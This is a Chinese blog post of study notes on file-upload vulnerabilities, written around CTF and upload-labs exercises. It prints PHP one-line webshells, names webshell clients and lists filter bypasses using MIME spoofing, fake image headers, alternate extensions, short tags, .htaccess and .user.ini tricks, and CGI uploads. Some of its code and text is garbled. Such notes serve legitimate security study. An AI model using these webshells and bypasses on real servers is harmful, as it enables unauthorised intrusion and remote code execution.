文件上传学习笔记

最新推荐文章于 2022-09-16 09:03:37 发布
最新推荐文章于 2022-09-16 09:03:37 发布
阅读量454 收藏
点赞数
分类专栏: 文件上传 渗透测试 文章标签: 安全 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/enver_jpg/article/details/117357692
版权

title: 文件上传学习笔记
date: 2021-5-22
tags: 渗透测试,文件上传,基础
categories:

渗透测试
文件上传
基础

文件上传学习笔记

2021/3/6 笔记

什么是一句话木马

一句话木马“服务端”(本地存储的脚本木马文件)
就是我们要用来将恶意代码上传到服务器的网站中执行权限
该语句触发后,接收入侵者通过客户端上传的数据,并完成相应的操作
好处:短小精悍、且功能强大
eval 意思是执行任意命令,将其当成php语言执行
<?php @eval($_GET[a]); ?>    加@是为了不在页面回显
<?php eval($_GET[a]); ?>
<?php eval($_POST[a]); ?>
<?php eval($_REQUEST[a]); ?>
<?php eval($_COOKIE[a]); ?>

一句话木马的变形

<?php assert($_POST[a]); ?>

连接工具

  • 中国蚁剑
  • 中国菜刀

文件检测手法

  • 客户端javascript校验(一般只校验后缀名)
  • 服务端校验
    • 文件头content-type字段校验(image/gif)(MIME类型)
    • 文件内容头校验(GIF89a)
    • 后缀名黑名单校验
    • 后缀名白名单校验
    • 自定义正侧校验
  • WAF设备校验(根据不同的WAF产品而定)
绕过
抓包,修改Content-Type:image/jpeg
文件头:伪造图片文件头(GIF89a)

客户端JavaScript校验

前端JS校验,可以直接绕过
  • 禁用JS
  • 删除οnsubmit="return chekFile()"
  • upload-labs Pass-01

文件头content-type校验

  • 直接上传木马图片,之后修改文件名为php可解析的后缀
  • 上传php文件,BP 抓包手动修改Content-type
  • upload-labs Pass-02

文件内容头校验

  • 手动伪造图片文件头,例如GIF89a
  • 在图片中插入PHP代码
  • upload-labs Pass-13

黑名单

<?php 
//实际情况中黑名单内数据会更多更全
$blacklist = array('php','asp','aspx','jsp');
$path = "./uploads";
$type = array_pop(explode('.',$_FILED['myfile']['name']));

if (in_array(strtolower($type),$blacklist)){
    die("File type errer!<br>");
}else{
    $file = $path.'/'.$_FILES['myfile']['name'];
    if(nove_uploaded_file($FILES['myfile']['tmp_name'],$file)){
        echo 'Success!<br>';
    }else{
        echo 'Error!<br>';
    }
}
?>

黑名单,尝试各种特殊文件名(php、Php、PHP、pht、php5、phtnl、shtml),或者在扩展名后添加空格、:: D A T A 、 . , DATA、., DATA.,,/…,等字符,子啊或者尝试上传‘.htaccess’

防御手段

随机文件名+白名单后缀

PHP:
php2	php3	PHP5	phtml	pht(是否解析需要根据配置文件中的设置类型来决定)
ASP:
asa	cer	cdx
ASPX:
ascx	ashx	asac
JSP:
jsp	jspx	jspf
绕过方法
php3	php4	php5
分别是php3版本	php4版本	php5版本的PHP文件,且向下兼容
upload-labs Pass-03

phtmlphtml是PHP2程序的标准文件扩展名upload-labs Pass-03

::$DATA(windows)上传文件为xxx.php::$DATA类型的文件。可以看到上传的文件为xxx.php::$data 。

大小写绕过.Php	.PHtmlupload-labs Pass-05

https://www.freebuf.com/column/143101.html

内容检测

  • 几种标签语法
    <??><?php<?=?><%<script lanague='php'>
    短标签
    两种短语标签必须在php5.4.0之后
    其中短语标签<? ?>需要在php.ini中开启配置short_open_tag才能使用
    <?= 等价于 <? echo 不用开启短标签
    <?= 'whoami'?><?= 'ls'?>

7.0.0	The ASP tags <%, %>, <%=, and the script tag <script language="php"> are ermoved from  php5.4.0	The tag <?= is always available regardless of the short_open_tag ini setting.

其中ASP标签<% %>需要将asp_tags设成On

通过php小于7.0的可以通过绕过

<srcipt language='php'>phpinfo();</srcipt>

当<? 被绕过时,可以尝试用<srcipt lanague='php'>绕过条件:PHP版本小于7.0BUU[极客大挑战2019]upload

PHP被过滤时,尝试用短标签<?        ?>绕过条件:PHP版本>5.4且php.ini中开启配置short_open_tag=1交出你的猫猫图

过滤GET POST,尝试用eval($_REQUEST[a]);绕过

过滤eval,尝试用assert($_GET[a]);绕过

.htaccess

//.htaccessaddtype application/x-httpd-php .jpg

上传.htaccess把.jpg当作PHP解析,只需要上传带shell的.jpg文件即可

//shell.jpg<script language='php'></script>

过滤文件内容

/.htaccessaddtype application/x-httpd-php .wuwuphp_value auto_append_file "php://filter/convert.base64-decode/resource=shell.wuwu"

base64.b64encode(b"<?php eval($_GET['c']);?>")

php_value auto_append_file  会给PHP文件附加后面的内容将shell的内容上传至shell.wuwuhtaccess上传至.htaccess然后访问shell.wuwu即可/只能执行命令 不能连接shell
  • 上传cgi脚本
  • Options +ExecCGIAddHandler cgi-script  .xx
  • cgi脚本最好在Linux下编写,保存为3.xx
  • #!/bin/bashecho "Content_type:text/plain"echo ""cat /flagexit 0

    cig参考文档: https://www.freebuf.com/vuls218495.html

    没有过滤.htaccess的黑名单时,考虑上传.htaccess文件使得jpg文件解析为PHPupload-labs Pass-04

    当webshell中的字符全部被过滤的时候,考虑用.htaccess文件进行base64编码后上传

    如果可以上传.cgi文件和.htaccess文件,可以考虑上传cgi脚本https://unctf.hackingfor.fun/#/train    easy_upload

.user.ini

.user.ini用于nginx/apache/IIS中

#利用条件服务器脚本语言为PHP服务器使用CGI/Fast CGI模式上传目录下要有可以执行的PHP文件
.user.ini实际上就是一个可以由用户“自定义”的PHP.ini
*PHP_INI_模式的定义
模式含义
PHP_INI_USER可以在用户脚本(例如ini_set())或Windows注册表(自PHP5.3起)以及.user.ini中设定
PHP_INI_PERDIR可在php.ini、.htaccess或httpd.conf中设定
PHP_INI_SYSTEM可在php.ini或http.conf中设定
PHP_INI_ALL可在任何地方设定
auto_append_fileNULLPHP_INI_PERDIR在PHP <= 4.2.3时是PHP_INI_ALL
auto_detect_line_endings"0"PHP_INI_ALL从PHP4.3.0起可用
auto_globals_jit"1"PHP_INI_PERDIR从PHP5.0.0起可用
auto_prepend_fileNULLPHP_INI_PERDIR在PHP <= 4.2.3时是PHP_INI_ALL
auto_prepend_file string
指定一个文件,自动包含在要执行的文件前,类似于在文件前调用了require()函数。而auto_append_file类似,只是在文件后面包含。使用方法很简单,直接写在user.ini中:

\x00\x00\x8a\x39\x8a\x39auto_perpend_file = cc.jpg

当不允许上传.htaccess服务器为nginx时,且为黑名单校验。请考虑上传.user.ini条件:服务器
仍在更新中… 敬请期待…
雅戈洛府
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
文件上传学习
good_study123的博客
06-28 151
1、直接使用send_keys上传文件,需要文件上传是一个普通的input 元素 from selenium import webdriver import time driver=webdriver.Chrome() driver.get("http://localhost:63342/python29/web/class01_selenium/demo_%E7%BD%91%E9%A1%B5.html?_ijt=g48jseptfbgm0e7o398crhqu6q") """直接使用send_ke
微信小程序学习笔记文件上传、下载操作图文详解
10-17
主要介绍了微信小程序学习笔记文件上传、下载操作,结合实例形式分析了微信小程序图片文件传输的原理、步骤及后台php操作相关实现技巧,并结合图文形式予以详细说明,需要的朋友可以参考下
python学习笔记.zip
07-23
这个资源是我在b站学习python时一个字一个字的写下来的,学习的视频来自b站一个叫:‘python_子木’的视频,视频名称叫:’花了2万多块买的python教程全套,现在分享给大家,入门到精通(python全栈开发教程)‘。因为我弄了很多个py文件,懒得一个个复制粘贴,所以以资源形式上传。该文章主要用于python学习和复习,不懂的可以一边结合b站的视频一起学习,还有,我不知道学习笔记的上传算不算侵权,如果有侵权的话,希望可以联系删除。
MongoDB学习笔记之GridFS使用介绍
12-16
GridFS简介 GridFS是MongoDB中的一个内置功能,可以用于存放大量小文件。 GridFS使用 MongoDB提供了一个命令行工具mongofiles可以来处理GridFS, 列出所有文件: 代码如下: mongofiles list 上传一个文件: 代码如下: mongofiles put xxx.txt 下载一个文件: 代码如下: mongofiles get xxx.txt 查找文件: 代码如下: //会查找所有文件名中包含“xxx”的文件 mongofiles search xxx //会查找所有文件名以“xxx”为前缀的文件 mongofiles l
asp.net中多文件上传学习笔记
05-19
关于asp.net上传中整理的一点学习笔记,实用易懂!如有不足之处,请大家多多指正!
PHP文件上传与下载学习笔记
12-02
PHP文件上传与下载学习笔记 PHP版本:1、文件上传配置 文件上传后,Php获取的上传文件的信息 PHP端config配置文件配置
文件上传学习
10-08 62
今天试着做了下文件的上传,代码如下: Dim FullFileName As String Dim FileName As String FullFileName = File.PostedFile.FileName FileName = FullFileName.Substring(FullFileName.Las...
文件上传学习和绕过
震山的博客
09-16 225
文件上传的绕过方式和部分解决方法
关于文件上传学习心得
qq_32329839的博客
11-07 774
在写之前,先写一下关于文件上传的细节,也就是一些容易出错的地方: 1.文件必须保存在WEB-INF下。目的是为了避免浏览器直接访问到。 2.文件重名问题:我们知道,在一个服务器中,很多人上传文件以后会出现重名问题。这个时候,我们需要对其进行重命名。方法很简单,在文件名前面加上CommonUtils里的UUID即可解决问题。 3.文件的绝对路径问题。有的浏览器在保存时,会把上传文件的路径名也一
Spring学习笔记2之表单数据验证、文件上传实例代码
09-02
主要介绍了Spring学习笔记2之表单数据验证、文件上传 的相关资料,非常不错,具有参考借鉴价值,需要的朋友可以参考下
xUtils3.0框架学习笔记分享
01-05
xUtils是开速开发安卓项目的开源框架,开源项目地址:https://github.com/wyouflf/xUtils3。使用起来非常方便。主要功能包括: 1、xUtils 支持超大文件(超过2G)上传,更全面的http请求协议支持(11种谓词)。 2、拥有更加灵活的ORM,更多的事件注解支持且不受混淆影响。 3、图片绑定支持gif(受系统兼容性影响, 部分gif文件只能静态显示), webp; 支持圆角, 圆形, 方形等裁剪, 支持自动旋转等。 4、数据库api简化提高性能, 达到和greenDao一致的性能。 5、HTTP实现替换HttpClient为UrlConnection
Java学习笔记(javase)
03-03
内容为本人整理学习javase时的笔记,java基础知识后续上传,内部含有两个文件,内容相同,文件格式不同,方便大家参考使用
.Net学习笔记之Layui多图片上传功能
01-02
前言: 多图上传在一些特殊的需求中我们经常会遇到,其实多图上传的原理大家都有各自的见解。对于Layui多图上传和我之前所说的通过js获取文本框中的文件数组遍历提交的原理一样,只不过是Layui中的upload.render方法已经帮我们封装好了,我们只管调用即可,也就是说你选中了几张图片,那么将会向后台请求与图片张数相同的次数,即为遍历提交的方式。 Layui文件/图片样式地址(官方文档):https://www.layui.com/demo/upload.html 一、引入Layui.cs和Layui.js: 需要本地项目中存在layui相关样式和js,非网络地址  <link rel
Netty学习笔记
01-20
Netty解决JDK空轮询BUG 1、创建一个新的Selector ... ... Netty的总结 Netty定位: 1 ....SpringBoot内置的容器(Tomcat/Jerry) ...2、直接做服务器(消息推送服务,游戏后台) ...Netty中大文件上传的那个handler是怎么
CTFshow_文件上传
qq_45927819的博客
11-29 2956
文章目录web151web152web153 web151 上传图片,经过测试只能上传后缀为png的图片 抓包改数据: 使用蚁剑连接: 找到flag! web152 做法和上题一样! web153 继续之前的操作,但并没有上传成功:
文件上传下载学习
dengliao9491的博客
10-07 113
文件上传核心要通过设置表单的enctype=”multipart/form-data”(具体的请求体数据格式可以通过火狐浏览器的开发者工具看到)来告诉浏览器以二进制流的方式上传数据(而不是默认的application/x-www-form-urlencoded) 文件下载的核心要通过设置响应的头部属性content-disposition=attachment;filename=xx...
文件上传漏洞练习 upload-labs(1~5)【js过滤,MIME过滤,黑名单过滤,.htaccess文件攻击,.user,ini文件攻击】
bin789456的博客
07-25 896
文件上传漏洞练习 upload-labs(1~5)【入门】 写在前面 文件上传是个常见的漏洞,也是CTF的考察点之一。环境的搭建较为简单,放出链接: https://github.com/c0ny1/upload-labs 我直接使用Windows集成包,放在php下面跑就行。 因为隐私和web shell的特殊性,演示到上传成功就会结束题目 来吧,现在就开始。 Pass-01 这是一个最为常见的js过滤,即只能使用图片格式的后缀,否则不予上传。 方法一:先将脚本的后缀改为.jpg再上传,随后抓包改回来。
java 上传文件_JAVA学习笔记——fileUpload文件上传
最新发布
05-17
文件上传是Web开发中常见的功能之一,Java中也提供了多种方式来实现文件上传。其中,一种常用的方式是通过Apache的commons-fileupload组件来实现文件上传。 以下是实现文件上传的步骤: 1.在pom.xml文件中添加以下依赖: ```xml <dependency> <groupId>commons-fileupload</groupId> <artifactId>commons-fileupload</artifactId> <version>1.3.3</version> </dependency> ``` 2.在前端页面中添加文件上传表单: ```html <form method="post" enctype="multipart/form-data" action="upload"> <input type="file" name="file"> <input type="submit" value="Upload"> </form> ``` 3.在后台Java代码中处理上传文件: ```java // 创建一个DiskFileItemFactory对象,用于解析上传的文件 DiskFileItemFactory factory = new DiskFileItemFactory(); // 设置缓冲区大小,如果上传的文件大于缓冲区大小,则先将文件保存到临时文件中,再进行处理 factory.setSizeThreshold(1024 * 1024); // 创建一个ServletFileUpload对象,用于解析上传的文件 ServletFileUpload upload = new ServletFileUpload(factory); // 设置上传文件的大小限制,这里设置为10MB upload.setFileSizeMax(10 * 1024 * 1024); // 解析上传的文件,得到一个FileItem的List集合 List<FileItem> items = upload.parseRequest(request); // 遍历FileItem的List集合,处理上传的文件 for (FileItem item : items) { // 判断当前FileItem是否为上传的文件 if (!item.isFormField()) { // 获取上传文件的文件名 String fileName = item.getName(); // 创建一个File对象,用于保存上传的文件 File file = new File("D:/uploads/" + fileName); // 将上传的文件保存到指定的目录中 item.write(file); } } ``` 以上代码中,首先创建了一个DiskFileItemFactory对象,用于解析上传的文件。然后设置了缓冲区大小和上传文件的大小限制。接着创建一个ServletFileUpload对象,用于解析上传的文件。最后遍历FileItem的List集合,判断当前FileItem是否为上传的文件,如果是,则获取文件名,创建一个File对象,将上传的文件保存到指定的目录中。 4.文件上传完成后,可以给用户一个提示信息,例如: ```java response.getWriter().write("File uploaded successfully!"); ``` 以上就是使用Apache的commons-fileupload组件实现文件上传的步骤。需要注意的是,文件上传可能会带来安全隐患,因此在处理上传的文件时,需要进行严格的校验和过滤

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值